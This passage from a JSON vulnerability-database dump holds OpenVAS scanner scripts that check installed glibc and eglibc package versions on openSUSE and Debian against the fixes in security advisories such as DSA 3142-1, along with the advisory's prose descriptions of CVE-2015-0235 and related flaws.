rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-32bit\", rpm:\"glibc-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo-32bit\", rpm:\"glibc-devel-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static-32bit\", rpm:\"glibc-devel-static-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", 
rpm:\"glibc-locale-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo-32bit\", rpm:\"glibc-locale-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:28", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\nfixed in eglibc, Debian", "modified": "2017-07-07T00:00:00", "published": "2015-01-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703142", "id": "OPENVAS:703142", "title": "Debian Security Advisory DSA 3142-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3142.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3142-1 using nvtgen 
1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703142);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\");\n script_name(\"Debian Security Advisory DSA 3142-1 (eglibc - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-01-27 00:00:00 +0100 (Tue, 27 Jan 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3142.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"eglibc on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the\nCVE-2015-0235\n\nissue has been fixed in version 2.18-1 of the glibc package.\n\nWe recommend that you upgrade your eglibc packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\nfixed in eglibc, Debian's version of the GNU C library:\n\nCVE-2015-0235\nQualys discovered that the gethostbyname and gethostbyname2\nfunctions were subject to a buffer overflow if provided with a\ncrafted IP address argument. This could be used by an attacker to\nexecute arbitrary code in processes which called the affected\nfunctions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nCVE-2014-7817\nTim Waugh of Red Hat discovered that the WRDE_NOCMD option of the\nwordexp function did not suppress command execution in all cases.\nThis allows a context-dependent attacker to execute shell\ncommands.\n\nCVE-2012-6656 CVE-2014-6040\nThe charset conversion code for certain IBM multi-byte code pages\ncould perform an out-of-bounds array access, causing the process\nto crash. 
In some scenarios, this allows a remote attacker to\ncause a persistent denial of service.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", 
ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libnss-dns-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss-files-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:52", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\nfixed in eglibc, Debian", "modified": "2019-03-18T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310703142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703142", "title": "Debian Security Advisory DSA 3142-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3142.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3142-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; 
either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703142\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\");\n script_name(\"Debian Security Advisory DSA 3142-1 (eglibc - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 00:00:00 +0100 (Tue, 27 Jan 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3142.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"eglibc on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the\nCVE-2015-0235\n\nissue has been fixed in version 2.18-1 
of the glibc package.\n\nWe recommend that you upgrade your eglibc packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\nfixed in eglibc, Debian's version of the GNU C library:\n\nCVE-2015-0235\nQualys discovered that the gethostbyname and gethostbyname2\nfunctions were subject to a buffer overflow if provided with a\ncrafted IP address argument. This could be used by an attacker to\nexecute arbitrary code in processes which called the affected\nfunctions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nCVE-2014-7817\nTim Waugh of Red Hat discovered that the WRDE_NOCMD option of the\nwordexp function did not suppress command execution in all cases.\nThis allows a context-dependent attacker to execute shell\ncommands.\n\nCVE-2012-6656 CVE-2014-6040\nThe charset conversion code for certain IBM multi-byte code pages\ncould perform an out-of-bounds array access, causing the process\nto crash. In some scenarios, this allows a remote attacker to\ncause a persistent denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", 
ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) 